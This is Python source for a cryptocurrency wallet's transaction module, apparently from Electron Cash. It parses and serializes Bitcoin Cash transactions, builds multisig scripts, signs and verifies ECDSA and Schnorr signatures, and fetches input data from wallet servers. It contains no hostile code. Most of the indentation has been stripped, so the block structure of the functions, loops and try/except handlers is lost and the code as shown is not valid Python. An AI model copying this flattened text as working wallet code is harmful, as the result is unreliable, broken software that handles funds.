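#   s = BCDataStream(); s.write_compact_size(300)
#   s.input == bytearray(b'\xfd\x2c\x01')   # 0xfd prefix + 2-byte little-endian length
# Values below 253 take a single byte; the 0xfd/0xfe/0xff prefixes introduce 2-, 4- and
# 8-byte little-endian lengths respectively.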
# This function comes from bitcointools, bct-LICENSE.txt.
def long_hex(bytes):
    return bh2u(bytes)
# This function comes from bitcointools, bct-LICENSE.txt.
def short_hex(bytes):
    t = bh2u(bytes)
if len(t) < 11:
return t
return t[0:4]+"..."+t[-4:]
def match_decoded(decoded, to_match):
if len(decoded) != len(to_match):
        return False
for i in range(len(decoded)):
if to_match[i] == opcodes.OP_PUSHDATA4 and decoded[i][0] <= opcodes.OP_PUSHDATA4 and decoded[i][0]>0:
continue # Opcodes below OP_PUSHDATA4 all just push data onto stack, and are equivalent.
if to_match[i] != decoded[i][0]:
return False
return True
def parse_sig(x_sig):
return [None if x == NO_SIGNATURE else x for x in x_sig]
def safe_parse_pubkey(x):
try:
return xpubkey_to_pubkey(x)
except:
return x
def parse_scriptSig(d, _bytes):
try:
decoded = Script.get_ops(_bytes)
except Exception as e:
# coinbase transactions raise an exception
print_error("cannot find address in input script", bh2u(_bytes))
return
match = [ opcodes.OP_PUSHDATA4 ]
if match_decoded(decoded, match):
item = decoded[0][1]
# payto_pubkey
d['type'] = 'p2pk'
d['signatures'] = [bh2u(item)]
d['num_sig'] = 1
d['x_pubkeys'] = ["(pubkey)"]
d['pubkeys'] = ["(pubkey)"]
return
# non-generated TxIn transactions push a signature
# (seventy-something bytes) and then their public key
# (65 bytes) onto the stack:
match = [ opcodes.OP_PUSHDATA4, opcodes.OP_PUSHDATA4 ]
if match_decoded(decoded, match):
sig = bh2u(decoded[0][1])
x_pubkey = bh2u(decoded[1][1])
try:
signatures = parse_sig([sig])
pubkey, address = xpubkey_to_address(x_pubkey)
except:
print_error("cannot find address in input script", bh2u(_bytes))
return
d['type'] = 'p2pkh'
d['signatures'] = signatures
d['x_pubkeys'] = [x_pubkey]
d['num_sig'] = 1
d['pubkeys'] = [pubkey]
d['address'] = address
return
# p2sh transaction, m of n
match = [ opcodes.OP_0 ] + [ opcodes.OP_PUSHDATA4 ] * (len(decoded) - 1)
if not match_decoded(decoded, match):
print_error("cannot find address in input script", bh2u(_bytes))
return
x_sig = [bh2u(x[1]) for x in decoded[1:-1]]
m, n, x_pubkeys, pubkeys, redeemScript = parse_redeemScript(decoded[-1][1])
# write result in d
d['type'] = 'p2sh'
d['num_sig'] = m
d['signatures'] = parse_sig(x_sig)
d['x_pubkeys'] = x_pubkeys
d['pubkeys'] = pubkeys
d['redeemScript'] = redeemScript
d['address'] = Address.from_P2SH_hash(hash160(redeemScript))
def parse_redeemScript(s):
dec2 = Script.get_ops(s)
# the following throw exception when redeemscript has one or zero opcodes
m = dec2[0][0] - opcodes.OP_1 + 1
n = dec2[-2][0] - opcodes.OP_1 + 1
op_m = opcodes.OP_1 + m - 1
op_n = opcodes.OP_1 + n - 1
match_multisig = [ op_m ] + [opcodes.OP_PUSHDATA4]*n + [ op_n, opcodes.OP_CHECKMULTISIG ]
if not match_decoded(dec2, match_multisig):
# causes exception in caller when mismatched
print_error("cannot find address in input script", bh2u(s))
return
x_pubkeys = [bh2u(x[1]) for x in dec2[1:-2]]
pubkeys = [safe_parse_pubkey(x) for x in x_pubkeys]
redeemScript = Script.multisig_script(m, [bytes.fromhex(p)
for p in pubkeys])
return m, n, x_pubkeys, pubkeys, redeemScript
def get_address_from_output_script(_bytes):
try:
decoded = Script.get_ops(_bytes)
# The Genesis Block, self-payments, and pay-by-IP-address payments look like:
# 65 BYTES:... CHECKSIG
match = [ opcodes.OP_PUSHDATA4, opcodes.OP_CHECKSIG ]
if match_decoded(decoded, match):
return TYPE_PUBKEY, PublicKey.from_pubkey(decoded[0][1])
# Pay-by-Bitcoin-address TxOuts look like:
# DUP HASH160 20 BYTES:... EQUALVERIFY CHECKSIG
match = [ opcodes.OP_DUP, opcodes.OP_HASH160, opcodes.OP_PUSHDATA4, opcodes.OP_EQUALVERIFY, opcodes.OP_CHECKSIG ]
if match_decoded(decoded, match):
return TYPE_ADDRESS, Address.from_P2PKH_hash(decoded[2][1])
# p2sh
match = [ opcodes.OP_HASH160, opcodes.OP_PUSHDATA4, opcodes.OP_EQUAL ]
if match_decoded(decoded, match):
return TYPE_ADDRESS, Address.from_P2SH_hash(decoded[1][1])
except Exception as e:
        print_error('{}: Failed to parse tx output {}. Exception was: {}'.format(__name__, _bytes.hex(), repr(e)))
pass
return TYPE_SCRIPT, ScriptOutput(bytes(_bytes))
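# Example (for reference): a standard P2PKH scriptPubKey is
#   76 a9 14 <20-byte pubkey hash> 88 ac
# i.e. OP_DUP OP_HASH160 <push 20> OP_EQUALVERIFY OP_CHECKSIG, which matches the second
# template above and yields (TYPE_ADDRESS, Address.from_P2PKH_hash(<hash>)).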
def parse_input(vds):
d = {}
prevout_hash = hash_encode(vds.read_bytes(32))
prevout_n = vds.read_uint32()
scriptSig = vds.read_bytes(vds.read_compact_size())
sequence = vds.read_uint32()
d['prevout_hash'] = prevout_hash
d['prevout_n'] = prevout_n
d['sequence'] = sequence
d['address'] = UnknownAddress()
if prevout_hash == '00'*32:
d['type'] = 'coinbase'
d['scriptSig'] = bh2u(scriptSig)
else:
d['x_pubkeys'] = []
d['pubkeys'] = []
d['signatures'] = {}
d['address'] = None
d['type'] = 'unknown'
d['num_sig'] = 0
d['scriptSig'] = bh2u(scriptSig)
try:
parse_scriptSig(d, scriptSig)
except Exception as e:
print_error('{}: Failed to parse tx input {}:{}, probably a p2sh (non multisig?). Exception was: {}'.format(__name__, prevout_hash, prevout_n, repr(e)))
# that whole heuristic codepath is fragile; just ignore it when it dies.
# failing tx examples:
# 1c671eb25a20aaff28b2fa4254003c201155b54c73ac7cf9c309d835deed85ee
# 08e1026eaf044127d7103415570afd564dfac3131d7a5e4b645f591cd349bb2c
# override these once more just to make sure
d['address'] = UnknownAddress()
d['type'] = 'unknown'
if not Transaction.is_txin_complete(d):
d['value'] = vds.read_uint64()
return d
def parse_output(vds, i):
d = {}
d['value'] = vds.read_int64()
scriptPubKey = vds.read_bytes(vds.read_compact_size())
d['type'], d['address'] = get_address_from_output_script(scriptPubKey)
d['scriptPubKey'] = bh2u(scriptPubKey)
d['prevout_n'] = i
return d
def deserialize(raw):
vds = BCDataStream()
vds.write(bfh(raw))
d = {}
start = vds.read_cursor
d['version'] = vds.read_int32()
n_vin = vds.read_compact_size()
assert n_vin != 0
d['inputs'] = [parse_input(vds) for i in range(n_vin)]
n_vout = vds.read_compact_size()
assert n_vout != 0
d['outputs'] = [parse_output(vds, i) for i in range(n_vout)]
d['lockTime'] = vds.read_uint32()
if vds.can_read_more():
raise SerializationError('extra junk at the end')
return d
# pay & redeem scripts
def multisig_script(public_keys, m):
n = len(public_keys)
assert n <= 15
assert m <= n
op_m = format(opcodes.OP_1 + m - 1, 'x')
op_n = format(opcodes.OP_1 + n - 1, 'x')
keylist = [op_push(len(k)//2) + k for k in public_keys]
return op_m + ''.join(keylist) + op_n + 'ae'
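# Example (for reference): for a 2-of-3 multisig, multisig_script(pubkeys, 2) returns
#   '52' + <push pk1> + <push pk2> + <push pk3> + '53' + 'ae'
# i.e. OP_2 <pk1> <pk2> <pk3> OP_3 OP_CHECKMULTISIG (OP_1 is 0x51, OP_CHECKMULTISIG is 0xae).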
class Transaction:
SIGHASH_FORKID = 0x40 # do not use this; deprecated
FORKID = 0x000000 # do not use this; deprecated
def __str__(self):
if self.raw is None:
self.raw = self.serialize()
return self.raw
def __init__(self, raw, sign_schnorr=False):
if raw is None:
self.raw = None
elif isinstance(raw, str):
self.raw = raw.strip() if raw else None
elif isinstance(raw, dict):
self.raw = raw['hex']
else:
raise BaseException("cannot initialize transaction", raw)
self._inputs = None
self._outputs = None
self.locktime = 0
self.version = 1
self._sign_schnorr = sign_schnorr
# attribute used by HW wallets to tell the hw keystore about any outputs
# in the tx that are to self (change), etc. See wallet.py add_hw_info
# which writes to this dict and the various hw wallet plugins which
# read this dict.
self.output_info = dict()
# Ephemeral meta-data used internally to keep track of interesting
# things. This is currently written-to by coinchooser to tell UI code
# about 'dust_to_fee', which is change that's too small to go to change
# outputs (below dust threshold) and needed to go to the fee.
#
# It is also used to store the 'fetched_inputs' which are asynchronously
# retrieved inputs (by retrieving prevout_hash tx's), see
#`fetch_input_data`.
#
# Values in this dict are advisory only and may or may not always be
# there!
self.ephemeral = dict()
def set_sign_schnorr(self, b):
self._sign_schnorr = b
def update(self, raw):
self.raw = raw
self._inputs = None
self.deserialize()
def inputs(self):
if self._inputs is None:
self.deserialize()
return self._inputs
def outputs(self):
if self._outputs is None:
self.deserialize()
return self._outputs
@classmethod
def get_sorted_pubkeys(self, txin):
# sort pubkeys and x_pubkeys, using the order of pubkeys
# Note: this function is CRITICAL to get the correct order of pubkeys in
# multisignatures; avoid changing.
x_pubkeys = txin['x_pubkeys']
pubkeys = txin.get('pubkeys')
if pubkeys is None:
pubkeys = [xpubkey_to_pubkey(x) for x in x_pubkeys]
pubkeys, x_pubkeys = zip(*sorted(zip(pubkeys, x_pubkeys)))
txin['pubkeys'] = pubkeys = list(pubkeys)
txin['x_pubkeys'] = x_pubkeys = list(x_pubkeys)
return pubkeys, x_pubkeys
def update_signatures(self, signatures):
"""Add new signatures to a transaction
`signatures` is expected to be a list of hex encoded sig strings with
*no* sighash byte at the end (implicitly always 0x41 (SIGHASH_FORKID|SIGHASH_ALL);
will be added by this function).
signatures[i] is intended for self._inputs[i].
The signature will be matched with the appropriate pubkey automatically
in the case of multisignature wallets.
This function is used by the Trezor, KeepKey, etc to update the
        transaction with signatures from the device.
Note this function supports both Schnorr and ECDSA signatures, but as
yet no hardware wallets are signing Schnorr.
"""
if self.is_complete():
return
if not isinstance(signatures, (tuple, list)):
raise Exception('API changed: update_signatures expects a list.')
if len(self.inputs()) != len(signatures):
raise Exception('expected {} signatures; got {}'.format(len(self.inputs()), len(signatures)))
for i, txin in enumerate(self.inputs()):
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
sig = signatures[i]
if not isinstance(sig, str):
raise ValueError("sig was bytes, expected string")
# sig_final is the signature with the sighashbyte at the end (0x41)
sig_final = sig + '41'
if sig_final in txin.get('signatures'):
# skip if we already have this signature
continue
pre_hash = Hash(bfh(self.serialize_preimage(i)))
sig_bytes = bfh(sig)
added = False
reason = []
for j, pubkey in enumerate(pubkeys):
# see which pubkey matches this sig (in non-multisig only 1 pubkey, in multisig may be multiple pubkeys)
if self.verify_signature(bfh(pubkey), sig_bytes, pre_hash, reason):
print_error("adding sig", i, j, pubkey, sig_final)
self._inputs[i]['signatures'][j] = sig_final
added = True
if not added:
resn = ', '.join(reversed(reason)) if reason else ''
print_error("failed to add signature {} for any pubkey for reason(s): '{}' ; pubkey(s) / sig / pre_hash = ".format(i, resn),
pubkeys, '/', sig, '/', bh2u(pre_hash))
# redo raw
self.raw = self.serialize()
def is_schnorr_signed(self, input_idx):
''' Return True IFF any of the signatures for a particular input
are Schnorr signatures (Schnorr signatures are always 64 bytes + 1) '''
if (isinstance(self._inputs, (list, tuple))
and input_idx < len(self._inputs)
and self._inputs[input_idx]):
# Schnorr sigs are always 64 bytes. However the sig has a hash byte
# at the end, so that's 65. Plus we are hex encoded, so 65*2=130
return any(isinstance(sig, (str, bytes)) and len(sig) == 130
for sig in self._inputs[input_idx].get('signatures', []))
return False
def deserialize(self):
if self.raw is None:
return
if self._inputs is not None:
return
d = deserialize(self.raw)
self._inputs = d['inputs']
self._outputs = [(x['type'], x['address'], x['value']) for x in d['outputs']]
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in self._outputs)
self.locktime = d['lockTime']
self.version = d['version']
return d
@classmethod
def from_io(klass, inputs, outputs, locktime=0, sign_schnorr=False):
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in outputs)
self = klass(None)
self._inputs = inputs
self._outputs = outputs.copy()
self.locktime = locktime
self.set_sign_schnorr(sign_schnorr)
return self
@classmethod
def pay_script(self, output):
return output.to_script().hex()
@classmethod
def estimate_pubkey_size_from_x_pubkey(cls, x_pubkey):
try:
if x_pubkey[0:2] in ['02', '03']: # compressed pubkey
return 0x21
elif x_pubkey[0:2] == '04': # uncompressed pubkey
return 0x41
elif x_pubkey[0:2] == 'ff': # bip32 extended pubkey
return 0x21
elif x_pubkey[0:2] == 'fe': # old electrum extended pubkey
return 0x41
except Exception as e:
pass
return 0x21 # just guess it is compressed
@classmethod
def estimate_pubkey_size_for_txin(cls, txin):
pubkeys = txin.get('pubkeys', [])
x_pubkeys = txin.get('x_pubkeys', [])
if pubkeys and len(pubkeys) > 0:
return cls.estimate_pubkey_size_from_x_pubkey(pubkeys[0])
elif x_pubkeys and len(x_pubkeys) > 0:
return cls.estimate_pubkey_size_from_x_pubkey(x_pubkeys[0])
else:
return 0x21 # just guess it is compressed
@classmethod
def get_siglist(self, txin, estimate_size=False, sign_schnorr=False):
# if we have enough signatures, we use the actual pubkeys
# otherwise, use extended pubkeys (with bip32 derivation)
num_sig = txin.get('num_sig', 1)
if estimate_size:
pubkey_size = self.estimate_pubkey_size_for_txin(txin)
pk_list = ["00" * pubkey_size] * len(txin.get('x_pubkeys', [None]))
# we assume that signature will be 0x48 bytes long if ECDSA, 0x41 if Schnorr
if sign_schnorr:
siglen = 0x41
else:
siglen = 0x48
sig_list = [ "00" * siglen ] * num_sig
else:
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
x_signatures = txin['signatures']
signatures = list(filter(None, x_signatures))
is_complete = len(signatures) == num_sig
if is_complete:
pk_list = pubkeys
sig_list = signatures
else:
pk_list = x_pubkeys
sig_list = [sig if sig else NO_SIGNATURE for sig in x_signatures]
return pk_list, sig_list
@classmethod
def input_script(self, txin, estimate_size=False, sign_schnorr=False):
_type = txin['type']
if _type == 'coinbase':
return txin['scriptSig']
pubkeys, sig_list = self.get_siglist(txin, estimate_size, sign_schnorr=sign_schnorr)
script = ''.join(push_script(x) for x in sig_list)
if _type == 'p2pk':
pass
elif _type == 'p2sh':
# put op_0 before script
script = '00' + script
redeem_script = multisig_script(pubkeys, txin['num_sig'])
script += push_script(redeem_script)
elif _type == 'p2pkh':
script += push_script(pubkeys[0])
elif _type == 'unknown':
return txin['scriptSig']
return script
@classmethod
def is_txin_complete(self, txin):
num_sig = txin.get('num_sig', 1)
x_signatures = txin['signatures']
signatures = list(filter(None, x_signatures))
return len(signatures) == num_sig
@classmethod
def get_preimage_script(self, txin):
_type = txin['type']
if _type == 'p2pkh':
return txin['address'].to_script().hex()
elif _type == 'p2sh':
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
return multisig_script(pubkeys, txin['num_sig'])
elif _type == 'p2pk':
pubkey = txin['pubkeys'][0]
return public_key_to_p2pk_script(pubkey)
elif _type == 'unknown':
# this approach enables most P2SH smart contracts (but take care if using OP_CODESEPARATOR)
return txin['scriptCode']
else:
raise RuntimeError('Unknown txin type', _type)
@classmethod
def serialize_outpoint(self, txin):
return bh2u(bfh(txin['prevout_hash'])[::-1]) + int_to_hex(txin['prevout_n'], 4)
@classmethod
def serialize_input(self, txin, script, estimate_size=False):
# Prev hash and index
s = self.serialize_outpoint(txin)
# Script length, script, sequence
s += var_int(len(script)//2)
s += script
s += int_to_hex(txin.get('sequence', 0xffffffff - 1), 4)
# offline signing needs to know the input value
if ('value' in txin # Legacy txs
and not (estimate_size or self.is_txin_complete(txin))):
s += int_to_hex(txin['value'], 8)
return s
def BIP_LI01_sort(self):
# See https://github.com/kristovatlas/rfc/blob/master/bips/bip-li01.mediawiki
self._inputs.sort(key = lambda i: (i['prevout_hash'], i['prevout_n']))
self._outputs.sort(key = lambda o: (o[2], self.pay_script(o[1])))
def serialize_output(self, output):
output_type, addr, amount = output
s = int_to_hex(amount, 8)
script = self.pay_script(addr)
s += var_int(len(script)//2)
s += script
return s
@classmethod
def nHashType(cls):
'''Hash type in hex.'''
warnings.warn("warning: deprecated tx.nHashType()", FutureWarning, stacklevel=2)
return 0x01 | (cls.SIGHASH_FORKID + (cls.FORKID << 8))
def serialize_preimage(self, i, nHashType=0x00000041):
if (nHashType & 0xff) != 0x41:
raise ValueError("other hashtypes not supported; submit a PR to fix this!")
nVersion = int_to_hex(self.version, 4)
nHashType = int_to_hex(nHashType, 4)
nLocktime = int_to_hex(self.locktime, 4)
inputs = self.inputs()
outputs = self.outputs()
txin = inputs[i]
hashPrevouts = bh2u(Hash(bfh(''.join(self.serialize_outpoint(txin) for txin in inputs))))
hashSequence = bh2u(Hash(bfh(''.join(int_to_hex(txin.get('sequence', 0xffffffff - 1), 4) for txin in inputs))))
hashOutputs = bh2u(Hash(bfh(''.join(self.serialize_output(o) for o in outputs))))
outpoint = self.serialize_outpoint(txin)
preimage_script = self.get_preimage_script(txin)
scriptCode = var_int(len(preimage_script) // 2) + preimage_script
try:
amount = int_to_hex(txin['value'], 8)
except KeyError:
raise InputValueMissing
nSequence = int_to_hex(txin.get('sequence', 0xffffffff - 1), 4)
preimage = nVersion + hashPrevouts + hashSequence + outpoint + scriptCode + amount + nSequence + hashOutputs + nLocktime + nHashType
return preimage
def serialize(self, estimate_size=False):
nVersion = int_to_hex(self.version, 4)
nLocktime = int_to_hex(self.locktime, 4)
inputs = self.inputs()
outputs = self.outputs()
txins = var_int(len(inputs)) + ''.join(self.serialize_input(txin, self.input_script(txin, estimate_size, self._sign_schnorr), estimate_size) for txin in inputs)
txouts = var_int(len(outputs)) + ''.join(self.serialize_output(o) for o in outputs)
return nVersion + txins + txouts + nLocktime
def hash(self):
warnings.warn("warning: deprecated tx.hash()", FutureWarning, stacklevel=2)
return self.txid()
def txid(self):
if not self.is_complete():
return None
ser = self.serialize()
return self._txid(ser)
@staticmethod
def _txid(raw_hex : str) -> str:
return bh2u(Hash(bfh(raw_hex))[::-1])
def add_inputs(self, inputs):
self._inputs.extend(inputs)
self.raw = None
def add_outputs(self, outputs):
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in outputs)
self._outputs.extend(outputs)
self.raw = None
def input_value(self):
return sum(x['value'] for x in (self.fetched_inputs() or self.inputs()))
def output_value(self):
return sum(val for tp, addr, val in self.outputs())
def get_fee(self):
return self.input_value() - self.output_value()
@profiler
def estimated_size(self):
'''Return an estimated tx size in bytes.'''
return (len(self.serialize(True)) // 2 if not self.is_complete() or self.raw is None
else len(self.raw) // 2) # ASCII hex string
@classmethod
def estimated_input_size(self, txin, sign_schnorr=False):
'''Return an estimated of serialized input size in bytes.'''
script = self.input_script(txin, True, sign_schnorr=sign_schnorr)
return len(self.serialize_input(txin, script, True)) // 2 # ASCII hex string
def signature_count(self):
r = 0
s = 0
for txin in self.inputs():
if txin['type'] == 'coinbase':
continue
signatures = list(filter(None, txin.get('signatures',[])))
s += len(signatures)
r += txin.get('num_sig',-1)
return s, r
def is_complete(self):
s, r = self.signature_count()
return r == s
@staticmethod
def verify_signature(pubkey, sig, msghash, reason=None):
''' Given a pubkey (bytes), signature (bytes -- without sighash byte),
and a sha256d message digest, returns True iff the signature is good
for the given public key, False otherwise. Does not raise normally
unless given bad or garbage arguments.
Optional arg 'reason' should be a list which will have a string pushed
at the front (failure reason) on False return. '''
if (any(not arg or not isinstance(arg, bytes) for arg in (pubkey, sig, msghash))
or len(msghash) != 32):
raise ValueError('bad arguments to verify_signature')
if len(sig) == 64:
# Schnorr signatures are always exactly 64 bytes
return schnorr.verify(pubkey, sig, msghash)
else:
from ecdsa import BadSignatureError, BadDigestError
from ecdsa.der import UnexpectedDER
# ECDSA signature
try:
pubkey_point = ser_to_point(pubkey)
vk = MyVerifyingKey.from_public_point(pubkey_point, curve=SECP256k1)
if vk.verify_digest(sig, msghash, sigdecode = ecdsa.util.sigdecode_der):
return True
except (AssertionError, ValueError, TypeError,
BadSignatureError, BadDigestError, UnexpectedDER) as e:
# ser_to_point will fail if pubkey is off-curve, infinity, or garbage.
# verify_digest may also raise BadDigestError and BadSignatureError
if isinstance(reason, list):
reason.insert(0, repr(e))
except BaseException as e:
print_error("[Transaction.verify_signature] unexpected exception", repr(e))
if isinstance(reason, list):
reason.insert(0, repr(e))
return False
@staticmethod
def _ecdsa_sign(sec, pre_hash):
pkey = regenerate_key(sec)
secexp = pkey.secret
private_key = MySigningKey.from_secret_exponent(secexp, curve = SECP256k1)
public_key = private_key.get_verifying_key()
sig = private_key.sign_digest_deterministic(pre_hash, hashfunc=hashlib.sha256, sigencode = ecdsa.util.sigencode_der)
assert public_key.verify_digest(sig, pre_hash, sigdecode = ecdsa.util.sigdecode_der)
return sig
@staticmethod
def _schnorr_sign(pubkey, sec, pre_hash):
pubkey = bytes.fromhex(pubkey)
sig = schnorr.sign(sec, pre_hash)
assert schnorr.verify(pubkey, sig, pre_hash) # verify what we just signed
return sig
def sign(self, keypairs):
for i, txin in enumerate(self.inputs()):
num = txin['num_sig']
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
for j, x_pubkey in enumerate(x_pubkeys):
signatures = list(filter(None, txin['signatures']))
if len(signatures) == num:
# txin is complete
break
if x_pubkey in keypairs.keys():
print_error("adding signature for", x_pubkey, "use schnorr?", self._sign_schnorr)
sec, compressed = keypairs.get(x_pubkey)
pubkey = public_key_from_private_key(sec, compressed)
# add signature
nHashType = 0x00000041 # hardcoded, perhaps should be taken from unsigned input dict
pre_hash = Hash(bfh(self.serialize_preimage(i, nHashType)))
if self._sign_schnorr:
sig = self._schnorr_sign(pubkey, sec, pre_hash)
else:
sig = self._ecdsa_sign(sec, pre_hash)
txin['signatures'][j] = bh2u(sig + bytes((nHashType & 0xff,)))
txin['pubkeys'][j] = pubkey # needed for fd keys
self._inputs[i] = txin
print_error("is_complete", self.is_complete())
self.raw = self.serialize()
def get_outputs(self):
"""convert pubkeys to addresses"""
o = []
for type, addr, v in self.outputs():
o.append((addr,v)) # consider using yield (addr, v)
return o
def get_output_addresses(self):
return [addr for addr, val in self.get_outputs()]
def has_address(self, addr):
return (addr in self.get_output_addresses()) or (addr in (tx.get("address") for tx in self.inputs()))
def is_final(self):
return not any([x.get('sequence', 0xffffffff - 1) < 0xffffffff - 1
for x in self.inputs()])
def as_dict(self):
if self.raw is None:
self.raw = self.serialize()
self.deserialize()
out = {
'hex': self.raw,
'complete': self.is_complete(),
'final': self.is_final(),
}
return out
# This cache stores foreign (non-wallet) tx's we fetched from the network
# for the purposes of the "fetch_input_data" mechanism. Its max size has
# been thoughtfully calibrated to provide a decent tradeoff between
# memory consumption and UX.
#
# In even aggressive/pathological cases this cache won't ever exceed
# 100MB even when full. [see ExpiringCache.size_bytes() to test it].
# This is acceptable considering this is Python + Qt and it eats memory
# anyway.. and also this is 2019 ;). Note that all tx's in this cache
# are in the non-deserialized state (hex encoded bytes only) as a memory
# savings optimization. Please maintain that invariant if you modify this
# code, otherwise the cache may grow to 10x memory consumption if you
# put deserialized tx's in here.
_fetched_tx_cache = ExpiringCache(maxlen=1000, name="TransactionFetchCache")
def fetch_input_data(self, wallet, done_callback=None, done_args=tuple(),
prog_callback=None, *, force=False, use_network=True):
'''
Fetch all input data and put it in the 'ephemeral' dictionary, under
'fetched_inputs'. This call potentially initiates fetching of
prevout_hash transactions from the network for all inputs to this tx.
The fetched data is basically used for the Transaction dialog to be able
to display fee, actual address, and amount (value) for tx inputs.
`wallet` should ideally have a network object, but this function still
will work and is still useful if it does not.
`done_callback` is called with `done_args` (only if True was returned),
upon completion. Note that done_callback won't be called if this function
returns False. Also note that done_callback runs in a non-main thread
context and as such, if you want to do GUI work from within it, use
the appropriate Qt signal/slot mechanism to dispatch work to the GUI.
`prog_callback`, if specified, is called periodically to indicate
progress after inputs are retrieved, and it is passed a single arg,
"percent" (eg: 5.1, 10.3, 26.3, 76.1, etc) to indicate percent progress.
Note 1: Results (fetched transactions) are cached, so subsequent
calls to this function for the same transaction are cheap.
Note 2: Multiple, rapid calls to this function will cause the previous
asynchronous fetch operation (if active) to be canceled and only the
latest call will result in the invocation of the done_callback if/when
it completes.
'''
if not self._inputs:
return False
if force:
# forced-run -- start with empty list
inps = []
else:
# may be a new list or list that was already in dict
inps = self.fetched_inputs(require_complete = True)
if len(self._inputs) == len(inps):
# we already have results, don't do anything.
return False
eph = self.ephemeral
eph['fetched_inputs'] = inps = inps.copy() # paranoia: in case another thread is running on this list
# Lazy imports to keep this functionality very self-contained
# These modules are always available so no need to globally import them.
import threading
import queue
import time
from copy import deepcopy
from collections import defaultdict
t0 = time.time()
t = None
cls = __class__
def doIt():
'''
This function is seemingly complex, but it's really conceptually
simple:
1. Fetch all prevouts either from cache (wallet or global tx_cache)
2. Or, if they aren't in either cache, then we will asynchronously
queue the raw tx gets to the network in parallel, across *all*
our connected servers. This is very fast, and spreads the load
around.
Tested with a huge tx of 600+ inputs all coming from different
prevout_hashes on mainnet, and it's super fast:
cd8fcc8ad75267ff9ad314e770a66a9e871be7882b7c05a7e5271c46bfca98bc '''
last_prog = -9999.0
need_dl_txids = defaultdict(list) # the dict of txids we will need to download (wasn't in cache)
def prog(i, prog_total=100):
''' notify interested code about progress '''
nonlocal last_prog
if prog_callback:
prog = ((i+1)*100.0)/prog_total
if prog - last_prog > 5.0:
prog_callback(prog)
last_prog = prog
while eph.get('_fetch') == t and len(inps) < len(self._inputs):
i = len(inps)
inp = deepcopy(self._inputs[i])
typ, prevout_hash, n, addr, value = inp.get('type'), inp.get('prevout_hash'), inp.get('prevout_n'), inp.get('address'), inp.get('value')
if not prevout_hash or n is None:
raise RuntimeError('Missing prevout_hash and/or prevout_n')
if typ != 'coinbase' and (not isinstance(addr, Address) or value is None):
tx = cls.tx_cache_get(prevout_hash) or wallet.transactions.get(prevout_hash)
if tx:
# Tx was in cache or wallet.transactions, proceed
# note that the tx here should be in the "not
# deserialized" state
if tx.raw:
# Note we deserialize a *copy* of the tx so as to
# save memory. We do not want to deserialize the
# cached tx because if we do so, the cache will
# contain a deserialized tx which will take up
# several times the memory when deserialized due to
# Python's memory use being less efficient than the
# binary-only raw bytes. So if you modify this code
# do bear that in mind.
tx = Transaction(tx.raw)
try:
tx.deserialize()
# The below txid check is commented-out as
# we trust wallet tx's and the network
# tx's that fail this check are never
# put in cache anyway.
#txid = tx._txid(tx.raw)
#if txid != prevout_hash: # sanity check
# print_error("fetch_input_data: cached prevout_hash {} != tx.txid() {}, ignoring.".format(prevout_hash, txid))
except Exception as e:
print_error("fetch_input_data: WARNING failed to deserialize {}: {}".format(prevout_hash, repr(e)))
tx = None
else:
tx = None
print_error("fetch_input_data: WARNING cached tx lacked any 'raw' bytes for {}".format(prevout_hash))
# now, examine the deserialized tx, if it's still good
if tx:
if n < len(tx.outputs()):
outp = tx.outputs()[n]
addr, value = outp[1], outp[2]
inp['value'] = value
inp['address'] = addr
print_error("fetch_input_data: fetched cached", i, addr, value)
else:
print_error("fetch_input_data: ** FIXME ** should never happen -- n={} >= len(tx.outputs())={} for prevout {}".format(n, len(tx.outputs()), prevout_hash))
else:
# tx was not in cache or wallet.transactions, mark
# it for download below (this branch can also execute
# in the unlikely case where there was an error above)
need_dl_txids[prevout_hash].append((i, n)) # remember the input# as well as the prevout_n
inps.append(inp) # append either cached result or as-yet-incomplete copy of _inputs[i]
# Now, download the tx's we didn't find above if network is available
            # and caller said it's ok to go out to the network; otherwise just return
# what we have
if use_network and eph.get('_fetch') == t and wallet.network and need_dl_txids:
try: # the whole point of this try block is the `finally` way below...
prog(-1) # tell interested code that progress is now 0%
# Next, queue the transaction.get requests, spreading them
# out randomly over the connected interfaces
q = queue.Queue()
q_ct = 0
bad_txids = set()
def put_in_queue_and_cache(r):
''' we cache the results directly in the network callback
as even if the user cancels the operation, we would like
to save the returned tx in our cache, since we did the
work to retrieve it anyway. '''
q.put(r) # put the result in the queue no matter what it is
txid = ''
try:
# Below will raise if response was 'error' or
# otherwise invalid. Note: for performance reasons
# we don't validate the tx here or deserialize it as
# this function runs in the network thread and we
# don't want to eat up that thread's CPU time
# needlessly. Also note the cache doesn't store
# deserialized tx's so as to save memory. We
# always deserialize a copy when reading the cache.
tx = Transaction(r['result'])
txid = r['params'][0]
assert txid == cls._txid(tx.raw), "txid-is-sane-check" # protection against phony responses
cls.tx_cache_put(tx=tx, txid=txid) # save tx to cache here
except Exception as e:
# response was not valid, ignore (don't cache)
if txid: # txid may be '' if KeyError from r['result'] above
bad_txids.add(txid)
print_error("fetch_input_data: put_in_queue_and_cache fail for txid:", txid, repr(e))
for txid, l in need_dl_txids.items():
wallet.network.queue_request('blockchain.transaction.get', [txid],
interface='random',
callback=put_in_queue_and_cache)
q_ct += 1
class ErrorResp(Exception):
pass
for i in range(q_ct):
# now, read the q back, with a 10 second timeout, and
# populate the inputs
try:
r = q.get(timeout=10)
if eph.get('_fetch') != t:
# early abort from func, canceled
break
if r.get('error'):
msg = r.get('error')
if isinstance(msg, dict):
msg = msg.get('message') or 'unknown error'
raise ErrorResp(msg)
rawhex = r['result']
txid = r['params'][0]
assert txid not in bad_txids, "txid marked bad" # skip if was marked bad by our callback code
tx = Transaction(rawhex); tx.deserialize()
for item in need_dl_txids[txid]:
ii, n = item
assert n < len(tx.outputs())
outp = tx.outputs()[n]
addr, value = outp[1], outp[2]
inps[ii]['value'] = value
inps[ii]['address'] = addr
print_error("fetch_input_data: fetched from network", ii, addr, value)
prog(i, q_ct) # tell interested code of progress
except queue.Empty:
print_error("fetch_input_data: timed out after 10.0s fetching from network, giving up.")
break
except Exception as e:
print_error("fetch_input_data:", repr(e))
finally:
# force-cancel any extant requests -- this is especially
# crucial on error/timeout/failure.
wallet.network.cancel_requests(put_in_queue_and_cache)
